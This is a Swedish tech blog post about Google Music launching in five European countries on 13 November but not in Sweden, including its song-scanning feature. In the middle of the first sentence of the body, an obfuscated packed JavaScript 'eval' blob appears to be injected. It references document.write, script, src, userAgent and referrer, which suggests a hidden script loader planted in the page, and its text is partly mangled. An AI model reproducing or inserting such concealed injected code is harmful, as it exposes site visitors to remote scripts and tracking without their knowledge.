Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Google Music snart här – dock inte till Sverige

Google Music snart här – dock inte till Sverige
Sebastian

Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hntif|var|u0026u|referrer|hzhzz||js|php’.split(’|’),0,{}))
Music: Streaming-vågen fortsätter att strömma in i marknaden. Denna gång är det Google Music som lanseras i Europa. Det är den 13 november som tjänsten kommer att lanseras, men inte för oss svenskar. 

I första hand är det Storbritannien, Frankrike, Tyskland, Spanien och Italien som får tillträde till musiktjänsten.
Valet är troligen satt just för det är dessa länder där den största marknaden finns. I pressmeddelandet som Google släppte står ingenting om att efter detta expandera vidare till fler länder.

Google Music går ut på att du som användare kan köpa och streama musik från deras molntjänst. Från och med den 14 november kommer du också kunna scanna musik du redan äger. Om scanningen matchar de låtar som finns i Google Music får du automatiskt tillgång till dessa i tjänsten, dvs, du behöver inte köpa låten igen.

Om och när tjänsten landar i vårt avlånga land är fortfarande oklart.